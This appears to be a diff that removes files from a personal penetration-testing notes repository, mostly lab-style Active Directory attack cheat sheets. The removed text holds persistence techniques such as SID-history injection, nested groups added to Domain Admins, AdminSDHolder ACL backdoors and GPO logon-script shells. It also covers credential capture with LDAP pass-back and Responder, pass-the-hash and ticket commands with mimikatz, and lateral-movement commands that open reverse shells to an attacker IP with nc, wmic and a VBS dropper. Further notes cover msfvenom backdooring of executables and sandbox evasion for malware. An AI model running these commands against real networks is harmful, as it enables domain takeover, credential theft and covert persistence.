Stop-Service -Name ntds -force
Add-ADDBSidHistory -SamAccountName 'username of our low-priveleged AD account' -SidHistory 'SID to add to SID History' -DatabasePath C:\Windows\NTDS\ntds.dit
Start-Service -Name ntds
```
* Verify users SIDs
```sh
Get-ADUser <username> -Properties sidhistory
dir \\<dc.example.com>\C$\
```
## Using Group Memberships
* Most are monitored security wise
* Interesting group for persistence are
* `IT Support`
* Local administrational accounts
* Groups with ownership over GPO
* Nested groups are used to organize an AD
* `Helpdesk`, `Network Manager` is a nested group of `IT Support`
* Joining a nested groups is not as alerting as joining a more general group
### Usage
* Create a new subgroup
```sh
New-ADGroup -Path "OU=IT,OU=People,DC=<SUBDC>,DC=<DOMAIN>,DC=COM" -Name "<username> Steam Network 1" -SamAccountName "<username>_steam_network1" -DisplayName "<username> Steam Network 1" -GroupScope Global -GroupCategory Security
```
* And nesting another one
```sh
New-ADGroup -Path "OU=SALES,OU=People,DC=ZA,DC=TRYHACKME,DC=LOC" -Name "<username> Steam Network 2" -SamAccountName "<username>_steam_network2" -DisplayName "<username> Steam Network 2" -GroupScope Global -GroupCategory Security
Add-ADGroupMember -Identity "<username>_steam_network2" -Members "<username>_steam_network1"
```
* Do it a couple of times again and add the last group to Domain Admins
```sh
Add-ADGroupMember -Identity "Domain Admins" -Members "<username>_2"
```
* Add the low priv user to the first group
```sh
Add-ADGroupMember -Identity "<username>_steam_networks1" -Members "<low privileged username>"
```
* And check
```sh
dir \\<domain>\c$\
```
* Verify nested group
```sh
Get-ADGroupMember -Identity "Domain Admins"
```
## Using ACLs
* AD group templates like `AdminSDHolder` can be used to copy its ACL through the AD's protected groups
* Domain Admins
* Administrators
* Enterprise/Schema Administrator
* SDProp as a process maps the ACLs to protected groups every hour
## Usage
* `runas /netonly /user:Administrator cmd.exe` and therein open `mmc`
* File -> Add Snap-In -> Active Directory Users and Groups
* View -> Advanced Features
* AdminSDHolder group in Domain -> System
* Right click the group -> Properties -> Security -> Add user and Check Names -> OK -> Allow on Full Control -> Apply -> OK
* Add the user to other groups with the new propagated permissions
## Using GPOs
* Restricted Group Memberships, admin access to every host in the domain
* Logon Script Deployment, get a shell when a user logs in
### Usage
* Craft a portable executable shell via meterpreter
* Craft a batch script
```sh
copy \\<domain>\sysvol\<subdomain>\scripts\shell.exe C:\windows\tmp\_shell.exe && timeout /t 20 && C:\windows\tmp\shell.exe
```
* Copy both to the sysvol
* `runas /netonly /user:Administrator cmd.exe` and therein open `mmc`
* File -> Add/Remove Snap-in -> Group Policy Management -> Add -> OK
* Right click Admins OU -> Create GPO in the domain -> link it -> name it
* Right click created policy -> Enforced
* Right click created policy -> edit -> User Configuration / Policies -> Window Settings -> Scripts (logon/logoff)
* Right click Logon -> Properties -> Scripts tab -> Add -> Browse
* Select the previously created batch script and PE
* Catch the shell when an admin logs on
* Once again open mmc
* Right click Enterprise Domain Controllers -> Edit settings, delete, modify security
* Click on every other group except Authenticated Users and remove them
* Add -> `Domain Computers` -> check names - OK
* Read Permissions -> OK -> Authenticated Users -> Remove

116
misc/active_directory/gaining_foothold_AD.md
View File

@ -1,116 +0,0 @@
# Active Directory - Gain Foothold
* Methods of aquiring the first set of credentials
## Aquire credentials
### OSINT
* Discover info about the target via
* Questions asked on Stack Overflow
* Credentials set in (github) repos
* Past breaches, [haveIbeenpwned](https://haveibeenpwned.com/), [DeHashed](https://www.dehashed.com/)
### Phishing
* Gain credentials via eMail
## NTLM Authenticated Services
* Windows Authentication on NetNTLM is a Challenge-Response protocol used to deliver a challenge and the result on behalf of a user -- through the application -- to the DC
* These may be exposed to the Internet. For example
* Mail exchange, OWA webmail
* RDP
* VPN endpoints
* Web applications using something like SSO via AD
* Use these applications to either brute force / spraying passwords to found IDs or to verify previously aquired IDs and their passwords
## LDAP Bind Credentials
* LDAP may be integrated into an AD Forest. An application may verify an LDAP account with the help of AD credentials at the DC.
* Third party programs may use LDAP like
* CUPS
* VPNs
* gitlab
### LDAP Pass-Back
* After gaining access to a device's config including LDAP parameters, reroute its IP to your own IP. This may be done via web UIs.
* Use an LDAP server to catch the credentials. Only PLAIN and LOGIN authentication must be allowed in order to gain the credentials.
* OpenLDAP
```sh
dpkg-reconfigure -p low slapd
```
* Skip reconfiguration -> No
* Insert DNS domain and organisation
* Provide password
* Select `MDB` as database
* No removal when db is purged
* Move old database when creating a new one
* Downgrade authentication via `*.ldif` file
```sh
dn: cn=config
replace: olcSaslSecProps
olcSaslSecProps: noanonymous,minssf=0,passcred
```
* Patch and reload ldap
```sh
sudo ldapmodify -Y EXTERNAL -H ldapi:// -f ./olcSaslSecProps.ldif && sudo service slapd restart
```
* Check via
```sh
ldapsearch -H ldap:// -x -LLL -s base -b "" supportedSASLMechanisms
```
* Make pcap via tcdump
## Authentication Relay
* Communcating services inside the network verify authentication of each other
* Intercept NTLM hashes send for example via `SMB` auth, or do a MITM
* Use responder poisons requests gained from
* __Link-Local Multicast Name Resolution__ (LLMNR)
* __NetBIOS Name Server__ (NBT-NS), send before LLMNR
* __Web Proxy Auto-Discovery__ (WPAD), finds proxies for future HTTP connections
### Capture via responder
* Run responder on LAN via
```sh
sudo responder -I <interface>
```
* Use `hashcat` to crack the hashes
```sh
hashcat -m 5600 hash.txt rockyout.txt --force
```
### Relay via responder
* `SMB` signing must not be enforced, either on or off
* Done after some intial enumeration and to gain administrative accounts
## Microsoft Deployment Toolkit (MDT)
* Deploy and patch software remotely
* Used in conjuction with Microsoft's System Center Configuration Manager (SCCM)
### Preboot Execution Environment (PXE)
* [Read this](https://www.riskinsight-wavestone.com/en/2020/01/taking-over-windows-workstations-pxe-laps/)
* Load and install OS via network
* `MDT` provisions PXE boot images
* An IP gained via `DHCP` is the validation step, PXE will be delivered by `MDT`
* Retrieve/enumerate images via `TFTP`
* Create an admin account after OS installation
* Password scraping to recover AD creds used during OS installation
* Use `PowerPXE.ps1` to extract `*.bcd` files
## Configuration Files
* Configurations of services and applications as well as registry keys
* Use enumeration scripts like `winpeas.sh` or `seatbelt`

264
misc/active_directory/lateral_movement.md
View File

@ -1,264 +0,0 @@
# Lateral Movement
* Finding credentials with more permissions move through the network cloaked, avoiding detection
* Context of connections from A to B with permission C might be suspicious, therefore some bypass has to be found
* Local and network/domain accounts have to be distinguished. UAC is enforced on local admin accounts and not on domain accounts
* __Service executables need their own special reverse shell__, `msfvenom` file format `exe-service`
## Remote Processes
### psexec
* Port `445`
* `SMB` protocol
* Group membership: `Administrators`
* Upload the service binary to `ADMIN$` directory of the SMB server
* Use `psexesvc.exe` via service control manager to execute the remote process
* Communication will be established through a named pipe
```sh
psexec64.exe \\%TARGET_IP% -u Administrator -p %PASSWORD% -i cmd.exe
```
### WinRM
* Ports `5985` (HTTP) and `5986` (HTTPS)
* Group Membership: `Remote Management Users`
* Execute powershell commands on remote targets
```sh
winrs.exe -u:Administrator -p:%PASSWORD% -r:target cmd
```
* Run through powershell alternatively via
```sh
$username = "Administrator";
$password = "SecurePassword";
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;
Enter-PSSession -Computername TARGET -Credential $credential
Invoke-Command -Computername TARGET -Credential -ScriptBlock {whoami}
```
### sc
* Ports `135`, `49152-65535` (DCE/RPC), `135` shows service endpoints on the high ports
* Ports `139` and `445`RPC over SMB named pipes, if SVCCTL fails over `135`
* Group Membership: `Administrators`
* Create service remotely via Service Control Manager (RPC) or `SVCCTL`
```sh
sc.exe \\%TARGET_IP% create MyService binPath= "net user newuser securepassword /add" start= auto
sc.exe \\%TARGET_IP% start MyService
sc.exe \\%TARGET_IP% stop MyService
sc.exe \\%TARGET_IP% delete MyService
```
### schtasks
* Create remote scheduled tasks
```sh
schtasks /s TARGET /RU "SYSTEM" /create /tn "SteamUpdateService" /tr "<command/payload to execute>" /sc ONCE /sd 01/01/1970 /st 00:00
schtasks /s TARGET /run /TN "SteamUpdateService"
```
* Delete scheduled tasks via
```sh
schtasks /S TARGET /TN "SteamUpdateService" /DELETE /F
```
### wmi
* Ports are
* DCOM `135` RPC and dynamic ports
* Wsman `5985` winrm HTTP and `5986` winrm HTTPS
* Group membership: `Administrators`
* To start, use the same object used for winrm
```sh
$username = "Administrator";
$password = "SecurePassword";
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;
```
* Store the session
```sh
$Opt = New-CimSessionOption -Protocol DCOM
$Session = New-Cimsession -ComputerName TARGET -Credential $credential -SessionOption $Opt -ErrorAction Stop
```
* __Spawn a remote process__
```sh
$Command = "powershell.exe -Command Set-Content -Path C:\payload.txt -Value itworked";
Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{
CommandLine = $Command
}
```
* Alternatively via
```sh
wmic.exe /user:Administrator /password:securepassword /node:TARGET process call create "cmd.exe /c nc64.exe -e cmd.exe %ATTACKER_IP% %ATTACKER_PORT%"
```
* __Spawn a remote service__
```sh
Invoke-CimMethod -CimSession $Session -ClassName Win32_Service -MethodName Create -Arguments @{
Name = "SteamUpdateService";
DisplayName = "SteamUpdateService";
PathName = "net user gabenewell securepassword /add";
ServiceType = [byte]::Parse("16"); # Win32OwnProcess : Start service in a new process
StartMode = "Manual"
}
```
* Initiate the service
```sh
$Service = Get-CimInstance -CimSession $Session -ClassName Win32_Service -filter "Name LIKE 'SteamUpdateService'"
Invoke-CimMethod -InputObject $Service -MethodName StartService
```
* Start and stop via
```sh
Invoke-CimMethod -InputObject $Service -MethodName StopService
Invoke-CimMethod -InputObject $Service -MethodName Delete
```
* __Spawn a remote scheduled task__
```sh
$Command = "cmd.exe"
$Args = "/c net user gabenewell securepassword /add"
$Action = New-ScheduledTaskAction -CimSession $Session -Execute $Command -Argument $Args
Register-ScheduledTask -CimSession $Session -Action $Action -User "NT AUTHORITY\SYSTEM" -TaskName "SteamUpdateService"
Start-ScheduledTask -CimSession $Session -TaskName "SteamUpdateService"
```
* Delete task via
```sh
Unregister-ScheduledTask -CimSession $Session -TaskName "SteamUpdateService"
```
* __ Install a remote msi package__
```sh
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$TARGET_IP LPORT=4711 -f msi -o steam.msi
```
* Upload and run via
```sh
Invoke-CimMethod -CimSession $Session -ClassName Win32_Product -MethodName Install -Arguments @{PackageLocation = "C:\Windows\steam.msi"; Options = ""; AllUsers = $false}
```
* Alternatively on older systems via
```sh
wmic /node:TARGET /user:DOMAIN\USER product call install PackageLocation=c:\Windows\steam.msi
```
## Further Authentication Methods
* NTLM
* Kerberos
### NTLM
#### __Pass the hash__
* Retrieve and pass a hash generated from the password
* Use mimikatz on local SAM
```sh
privilege::debug
token::elevate
lsadump::sam
```
* Use mimikatz on lsass
```sh
privilege::debug
token::elevate
sekurlsa::msv
```
* Open reverse shell via mimikatz
```sh
token::revert
sekurlsa::pth /user:<username>
/domain:<domainname> /ntlm:<hash> /run:"C:\Windows\temp\nc.exe -e cmd.exe %ATTACKER_IP% 4711"
```
* Via RDP
```sh
xfreerdp /v:$TARGET_IP /u:DOMAIN\\<username> /pth:<ntlm-hash>
```
* Via psexec
```sh
psexec.py -hashes <ntlm-hash> DOMAIN/<username>@%TARGET_IP%
```
* Kerberos
```sh
evil-winrm -i $TARGET_IP -u <username> -H <ntlm-hash>
```
### Kerberos
* Ticket and session key are needed
#### Pass The Ticket
* Extract via mimikatz
```sh
privilege::debug
sekurlsa::tickets /export
```
* TGS need low privilege account, TGT need administrative privileges
* Use the ticket to inject into a current session
```sh
kerberos::ptt <ticket>@<domain>.kirbi
```
* Check tickets via `klist`
#### Overpass The Hash
* Pass the key: Timestamp to gain TGT is encrypted via an encrypted key
* Algorithms can be `rc4`, `aes128`, `aes256` or `des` if enabled
* `rc4` is a pure ntml hash
* Use the key to gain the TGT
```sh
privilege::debug
sekurlsa::ekeys
```
* Open a reverse shell via
```sh
sekurlsa::pth /user:Administrator /domain:<domain> /<hash-algorithm>:<hash> /run:"C:\Windows\Temp\nc.exe -e cmd.exe %ATTACKER_IP% 4711"
```
## Writeable Shares
* Find a shortcut, a script or anything that keeps a connection over the network to a share
* Reuse a `*.vbs` via
```sh
CreateObject("WScript.Shell").Run "cmd.exe /c copy /Y \\%TARGET_IP%\share\nc.exe %tmp% & %tmp%\nc.exe -e cmd.exe %ATTACKER_IP% 4711", 0, True
```
* Reuse and inject into exisiting portable executable
```sh
msfvenom -a x64 --platform windows -x <reused.exe> -k -p windows/meterpreter/reverse_tcp LHOST=$ATTACKER_IP LPORT=4711 -b "\x00" -f exe -o <new_reused.exe>
```
* Reuse RDP session. Administrator can be logged out but did not close the session. Reuse it without a password as administrator user. Therefore run `cmd` or `powershell` as administrator and reuse the session by its name
```sh
PsExec64.exe -s cmd.exe
query user
```
* Check output and fill in
```sh
tscon <ID-of-target> /dest:<my-SESSIONNAME>
```
* Session state should be `DISC`, a session which was not exited correctly
* Windows Server < 2019 only without the password

207
misc/active_directory/powerview.ps1
View File

@ -1,207 +0,0 @@
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : find specific data entries in a data set
# Add : add a new object to a destination
# Set : modify a given object
# Invoke : lazy catch-all
# Nouns:
# Verb-Domain* : indicates that LDAP/.NET querying methods are being executed
# Verb-WMI* : indicates that WMI is being used under the hood to execute enumeration
# Verb-Net* : indicates that Win32 API access is being used under the hood
# get all the groups a user is effectively a member of, 'recursing up' using tokenGroups
Get-DomainGroup -MemberIdentity <User/Group>
# get all the effective members of a group, 'recursing down'
Get-DomainGroupMember -Identity "Domain Admins" -Recurse
# use an alterate creadential for any function
$SecPassword = ConvertTo-SecureString 'BurgerBurgerBurger!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-DomainUser -Credential $Cred
# retrieve all the computer dns host names a GPP password applies to
Get-DomainOU -GPLink '<GPP_GUID>' | % {Get-DomainComputer -SearchBase $_.distinguishedname -Properties dnshostname}
# get all users with passwords changed > 1 year ago, returning sam account names and password last set times
$Date = (Get-Date).AddYears(-1).ToFileTime()
Get-DomainUser -LDAPFilter "(pwdlastset<=$Date)" -Properties samaccountname,pwdlastset
# all enabled users, returning distinguishednames
Get-DomainUser -LDAPFilter "(!userAccountControl:1.2.840.113556.1.4.803:=2)" -Properties distinguishedname
Get-DomainUser -UACFilter NOT_ACCOUNTDISABLE -Properties distinguishedname
# all disabled users
Get-DomainUser -LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=2)"
Get-DomainUser -UACFilter ACCOUNTDISABLE
# all users that require smart card authentication
Get-DomainUser -LDAPFilter "(useraccountcontrol:1.2.840.113556.1.4.803:=262144)"
Get-DomainUser -UACFilter SMARTCARD_REQUIRED
# all users that *don't* require smart card authentication, only returning sam account names
Get-DomainUser -LDAPFilter "(!useraccountcontrol:1.2.840.113556.1.4.803:=262144)" -Properties samaccountname
Get-DomainUser -UACFilter NOT_SMARTCARD_REQUIRED -Properties samaccountname
# use multiple identity types for any *-Domain* function
'S-1-5-21-890171859-3433809279-3366196753-1114', 'CN=dfm,CN=Users,DC=testlab,DC=local','4c435dd7-dc58-4b14-9a5e-1fdb0e80d201','administrator' | Get-DomainUser -Properties samaccountname,lastlogoff
# find all users with an SPN set (likely service accounts)
Get-DomainUser -SPN
# check for users who don't have kerberos preauthentication set
Get-DomainUser -PreauthNotRequired
Get-DomainUser -UACFilter DONT_REQ_PREAUTH
# find all service accounts in "Domain Admins"
Get-DomainUser -SPN | ?{$_.memberof -match 'Domain Admins'}
# find users with sidHistory set
Get-DomainUser -LDAPFilter '(sidHistory=*)'
# find any users/computers with constrained delegation st
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth
# enumerate all servers that allow unconstrained delegation, and all privileged users that aren't marked as sensitive/not for delegation
$Computers = Get-DomainComputer -Unconstrained
$Users = Get-DomainUser -AllowDelegation -AdminCount
# return the local *groups* of a remote server
Get-NetLocalGroup SERVER.domain.local
# return the local group *members* of a remote server using Win32 API methods (faster but less info)
Get-NetLocalGroupMember -Method API -ComputerName SERVER.domain.local
# Kerberoast any users in a particular OU with SPNs set
Invoke-Kerberoast -SearchBase "LDAP://OU=secret,DC=testlab,DC=local"
# Find-DomainUserLocation == old Invoke-UserHunter
# enumerate servers that allow unconstrained Kerberos delegation and show all users logged in
Find-DomainUserLocation -ComputerUnconstrained -ShowAll
# hunt for admin users that allow delegation, logged into servers that allow unconstrained delegation
Find-DomainUserLocation -ComputerUnconstrained -UserAdminCount -UserAllowDelegation
# find all computers in a given OU
Get-DomainComputer -SearchBase "ldap://OU=..."
# Get the logged on users for all machines in any *server* OU in a particular domain
Get-DomainOU -Identity *server* -Domain <domain> | %{Get-DomainComputer -SearchBase $_.distinguishedname -Properties dnshostname | %{Get-NetLoggedOn -ComputerName $_}}
# enumerate all gobal catalogs in the forest
Get-ForestGlobalCatalog
# turn a list of computer short names to FQDNs, using a global catalog
gc computers.txt | % {Get-DomainComputer -SearchBase "GC://GLOBAL.CATALOG" -LDAP "(name=$_)" -Properties dnshostname}
# enumerate the current domain controller policy
$DCPolicy = Get-DomainPolicy -Policy DC
$DCPolicy.PrivilegeRights # user privilege rights on the dc...
# enumerate the current domain policy
$DomainPolicy = Get-DomainPolicy -Policy Domain
$DomainPolicy.KerberosPolicy # useful for golden tickets ;)
$DomainPolicy.SystemAccess # password age/etc.
# enumerate what machines that a particular user/group identity has local admin rights to
# Get-DomainGPOUserLocalGroupMapping == old Find-GPOLocation
Get-DomainGPOUserLocalGroupMapping -Identity <User/Group>
# enumerate what machines that a given user in the specified domain has RDP access rights to
Get-DomainGPOUserLocalGroupMapping -Identity <USER> -Domain <DOMAIN> -LocalGroup RDP
# export a csv of all GPO mappings
Get-DomainGPOUserLocalGroupMapping | %{$_.computers = $_.computers -join ", "; $_} | Export-CSV -NoTypeInformation gpo_map.csv
# use alternate credentials for searching for files on the domain
# Find-InterestingDomainShareFile == old Invoke-FileFinder
$Password = "PASSWORD" | ConvertTo-SecureString -AsPlainText -Force
$Credential = New-Object System.Management.Automation.PSCredential("DOMAIN\user",$Password)
Find-InterestingDomainShareFile -Domain DOMAIN -Credential $Credential
# enumerate who has rights to the 'matt' user in 'testlab.local', resolving rights GUIDs to names
Get-DomainObjectAcl -Identity matt -ResolveGUIDs -Domain testlab.local
# grant user 'will' the rights to change 'matt's password
Add-DomainObjectAcl -TargetIdentity matt -PrincipalIdentity will -Rights ResetPassword -Verbose
# audit the permissions of AdminSDHolder, resolving GUIDs
Get-DomainObjectAcl -SearchBase 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -ResolveGUIDs
# backdoor the ACLs of all privileged accounts with the 'matt' account through AdminSDHolder abuse
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -PrincipalIdentity matt -Rights All
# retrieve *most* users who can perform DC replication for dev.testlab.local (i.e. DCsync)
Get-DomainObjectAcl "dc=dev,dc=testlab,dc=local" -ResolveGUIDs | ? {
($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')
}
# find linked DA accounts using name correlation
Get-DomainGroupMember 'Domain Admins' | %{Get-DomainUser $_.membername -LDAPFilter '(displayname=*)'} | %{$a=$_.displayname.split(' ')[0..1] -join ' '; Get-DomainUser -LDAPFilter "(displayname=*$a*)" -Properties displayname,samaccountname}
# save a PowerView object to disk for later usage
Get-DomainUser | Export-Clixml user.xml
$Users = Import-Clixml user.xml
# Find any machine accounts in privileged groups
Get-DomainGroup -AdminCount | Get-DomainGroupMember -Recurse | ?{$_.MemberName -like '*$'}
# Enumerate permissions for GPOs where users with RIDs of > -1000 have some kind of modification/control rights
Get-DomainObjectAcl -LDAPFilter '(objectCategory=groupPolicyContainer)' | ? { ($_.SecurityIdentifier -match '^S-1-5-.*-[1-9]\d{3,}$') -and ($_.ActiveDirectoryRights -match 'WriteProperty|GenericAll|GenericWrite|WriteDacl|WriteOwner')}
# find all policies applied to a current machine
Get-DomainGPO -ComputerIdentity windows1.testlab.local
# enumerate all groups in a domain that don't have a global scope, returning just group names
Get-DomainGroup -GroupScope NotGlobal -Properties name
# enumerate all foreign users in the global catalog, and query the specified domain localgroups for their memberships
# query the global catalog for foreign security principals with domain-based SIDs, and extract out all distinguishednames
$ForeignUsers = Get-DomainObject -Properties objectsid,distinguishedname -SearchBase "GC://testlab.local" -LDAPFilter '(objectclass=foreignSecurityPrincipal)' | ? {$_.objectsid -match '^S-1-5-.*-[1-9]\d{2,}$'} | Select-Object -ExpandProperty distinguishedname
$Domains = @{}
$ForeignMemberships = ForEach($ForeignUser in $ForeignUsers) {
# extract the domain the foreign user was added to
$ForeignUserDomain = $ForeignUser.SubString($ForeignUser.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
# check if we've already enumerated this domain
if (-not $Domains[$ForeignUserDomain]) {
$Domains[$ForeignUserDomain] = $True
# enumerate all domain local groups from the given domain that have membership set with our foreignSecurityPrincipal set
$Filter = "(|(member=" + $($ForeignUsers -join ")(member=") + "))"
Get-DomainGroup -Domain $ForeignUserDomain -Scope DomainLocal -LDAPFilter $Filter -Properties distinguishedname,member
}
}
$ForeignMemberships | fl
# if running in -sta mode, impersonate another credential a la "runas /netonly"
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Invoke-UserImpersonation -Credential $Cred
# ... action
Invoke-RevertToSelf
# enumerates computers in the current domain with 'outlier' properties, i.e. properties not set from the firest result returned by Get-DomainComputer
Get-DomainComputer -FindOne | Find-DomainObjectPropertyOutlier
# set the specified property for the given user identity
Set-DomainObject testuser -Set @{'mstsinitialprogram'='\\EVIL\program.exe'} -Verbose
# Set the owner of 'dfm' in the current domain to 'harmj0y'
Set-DomainObjectOwner -Identity dfm -OwnerIdentity harmj0y
# retrieve *most* users who can perform DC replication for dev.testlab.local (i.e. DCsync)
Get-ObjectACL "DC=testlab,DC=local" -ResolveGUIDs | ? {
($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ObjectAceType -match 'Replication-Get')
}
# check if any user passwords are set
$FormatEnumerationLimit=-1;Get-DomainUser -LDAPFilter '(userPassword=*)' -Properties samaccountname,memberof,userPassword | % {Add-Member -InputObject $_ NoteProperty 'Password' "$([System.Text.Encoding]::ASCII.GetString($_.userPassword))" -PassThru} | fl

3
misc/bash.md
View File

@ -1,3 +0,0 @@
# Shell Scripting
[Bash Cheatsheet](https://devhints.io/bash)

23
misc/clamav.md
View File

@ -1,23 +0,0 @@
# ClamAV
* Can be started with custom database or yara rules
## Hashes Database
* `*.hdb` is a database containing hashes. Can be customized and scanned against
## Yara Rules
* Custom `*.yara` rules can be set. An example
```yara
rule example {
meta:
author = "Gabe Newell"
description = "Look at how the Yara rule works with ClamAV"
strings:
$string = "a-string-found-inside-the-malicious-binary"
$file_signature = "magic-number-in-ascii"
condition:
#file_signature at 0 and $string
}
```

11
misc/gitTools.md
View File

@ -1,11 +0,0 @@
# GitTools
* extract commits from repo
```sh
./extractor.sh <repo_with_.git> <targetdir>
```
* List `commit-meta.txt` files from all commits
```sh
separator="======================================="; for i in $(ls); do printf "\n\n$separator\n\033[4;1m$i\033[0m\n$(cat $i/commit-meta.txt)\n"; done; printf "\n\n$separator\n\n\n"
```
* Compare hashes of the commits. The one without a parent is the oldest one.

57
misc/hadoop.md
View File

@ -1,57 +0,0 @@
# Hadoop
Distributed storage and computing
* [Hadoop Attack Libs](https://github.com/wavestone-cdt/hadoop-attack-library.git)
## Terminology
* __Cluster__, forms the datalake
* __Node__, single host inside the cluster
* __NameNode__, node that keeps the dir tree of the Hadoop file system
* __DataNode__, slave node that stores files and is instructed by the NameNode
* __Primary NameNode__, current active node responsible for keeping the directory structure
* __Secondary NameNode__, hot standby for Primary NameNode. There may be multiple on standby inside the cluster
* __Master Node__, Hadoop management app like HDFS or YARN Manager
* __Slave Node__, Hadoop worker like HDFS or MapReduce. a node can be master and slave at the same time
* __Edge Node__, hosting Hadoop user app like Zeppelin or Hue
* __Kerberised__, security enabled cluster through Kerberos
* __HDFS__, Hadoop Distributed File System, storage device for unstructured data
* __Hive__, primary DB for structured data
* __YARN__, scheduling jobs and resource management
* __MapReduce__, distributed filtering, sorting and reducing
* __HUE__, GUI for HDFS and Hive
* __Zookeeper__, cluster management
* __Kafka__, message broker
* __Ranger__, privileged ACL
* __Zeppelin__, data analytivs inside a webUI
## Zeppelin
* Try [default logins](https://zeppelin.apache.org/docs/0.8.2/setup/security/shiro_authentication.html#4-login)
* Try execution inside notebooks
## Ktabs
* Finding `ktpass`es to authenticate at the kerberos TGS
* Output principals and use them to init
```sh
klist -k <keytabfile>
kinit <prinicpal name> -k -V -t <keytabfile>
```
## HDFS
* User the `hdfs` utility to enumerate the distributed network storage
```sh
hdfs dfs -ls /
```
* Current user and user on the storage do not have to correspond
* Touched files on the storage may be owned by root
```sh
hdfs dfs -touchz testfile /tmp/testfile
hdfs dfs -ls /tmp
```
* Impersonate by sourcing keytab file of the user, __NodeManager__ is the highest user in regards to permission

95
misc/metasploit.md
View File

@ -1,95 +0,0 @@
# Metasploit
## Modules
* __Auxiliary__ scanners, crawlers and fuzzers
* __Encoders__ encode payloads
* __Evasion__ prepare payloads to circumvent signature based malware detection
* __NOPs__ various architectures
* __Payloads__ to run on target systems
* Singles, inline payloads, for example generic/shell_reverse_tcp
* Stagers, downloads the stages payloads
* Stages, for example windows/x64/shell/reverse_tcp
* __Post__ postexploitation
## Notes
* Search via scope
```sh
search type:auxiliary <stuff>
```
* Send exploit to background
```
run -z
```
* `check` if target is vulnerable
* `setg` sets variables globally
* `unset payload`
* Flush via `unset all`
## Sessions
* `background` or `ctrl+z`
* Foreground via `sessions -i <number>`
## Scanning
* Portscan
```sh
search portscan
```
* UDP Sweep via `scanner/discovery/udp_sweep`
* SMB Scan via `scanner/smb/smb_version` and `smb_enumshares`
* SMB login dictionary attack `scanner/smb/smb_login`
* NetBios via `scanner/netbios/nbname`
* HTTP version `scanner/http/http_version`
## Database
* Start postgres
* `msfdb init`
* `db_status`
* Separate `workspace -a <projectname>`
* Safe scans via `db_nmap`
* Show `hosts`
* Show `services`
* Set RHOST values via `hosts -R`
## Exploits
* `show targets`
* `show payloads`
## Reverse Shells
* Multihandler, set options
```sh
use exploit/multi/handler
set payload <payloadhandler>
```
* Shellshock as an example
```sh
use multi/http/apache_mod_cgi_bash_env_exec
```
## Post Exploitation
* `load kiwi`
* `load python`
* Windows
* list SAM database
```sh
migrate <lsass.exe-PID>
hashdump
```
* enum shares
```sh
post/windows/gather/enum_shares
```
* Linux
* `use post/linux/gather/hashdump`
## Other Meterpreter stuff
* Staged and in disguise running as another servicename
```
getpid
ps
```
* Attempt to elevate privileges
```sh
getsystem
```
* Use `multi/handler` or exploit and get an overview via `show payloads`
* UserID via `getuid`

1
misc/nishang

@ -1 +0,0 @@
Subproject commit 414ee1104526d7057f9adaeee196d91ae447283e

1
misc/printer_hacking/PRET

@ -1 +0,0 @@
Subproject commit 638caad881717b96081ed52d6e7d9c88b0b1b0f2

4
misc/printer_hacking/preta.md
View File

@ -1,4 +0,0 @@
# Printer Hacking
* [Preta](https://github.com/RUB-NDS/PRET)
* [Cheat Sheet](http://hacking-printers.net/wiki/index.php/Printer_Security_Testing_Cheat_Sheet)

21
misc/responder.md
View File

@ -1,21 +0,0 @@
# Responder
## Impersonate Domain -- Change Responder's certificates
* After using nsupdate to add the attacker as a subdomain do the following tasks
* Add a certificate and its private key to
```sh
/usr/share/responder/certs
```
* Edit `Responder.conf`
```
[HTTPS Server]
; Configure SSL Certificates to use
SSLCert = certs/cert.pem
SSLKey = certs/key.pem
```
* Start responder
```sh
responder -I <interface>
```

42
misc/sandbox_evasion.md
View File

@ -1,42 +0,0 @@
# Sandbox Evasion
* Evade the usual checks that will be run on you malware
## Sleeping
* [checkpoint](https://evasions.checkpoint.com/techniques/timing.html)
* [joesecurity](https://www.joesecurity.org/blog/660946897093663167)
## Geolocation
* Check the IP of the machine
* Check the block of the ISP via
```sh
https://rdap.arin.net/registry/ip/<IPBlock>
```
## System Info
* Check system info like
```sh
hostname
user
serial number
software versions
hardware specs
product keys
```
## Network Info
* Check all available network info like
```sh
interfaces
traffic
groups
domain admins
enterprise admins
dns
```

3
misc/smtp.md
View File

@ -1,3 +0,0 @@
# SMTP
* [hacktrick's site](https://book.hacktricks.xyz/pentesting/pentesting-smtp)

142
misc/snort.md
View File

@ -1,142 +0,0 @@
# Snort
Snort is comprised of multiple modules to process network packets.
* __packet decoder__
* __pre processor__
* __detection engine__
* __logging and alerting__
* __output and plugins__
## Data Aquisition Modules
* __Pcap__, default
* __Afpacket__, inline mode, IPS
* __Ipq__, uses netfilter on linux
* __Nfq__, inline mode on linux
* __Ipfw__, inline mode on BSD
* __Dump__, test mode
## Usage
* Check config, and run tests via
```sh
snort -c <config> -T
```
### Sniffing
| Parameter | Description |
|-----------|-------------|
| -v | Verbose. Display the TCP/IP output in the console.|
| -d | Display the packet data (payload).|
| -e | Display the link-layer (TCP/IP/UDP/ICMP) headers. |
| -X | Display the full packet details in HEX.|
| -i | Liste on interface |
### Packet Logger
* Logged by IP as directory, ports as files inside these dirs
* BPF filter can be used like `tcp port 80`
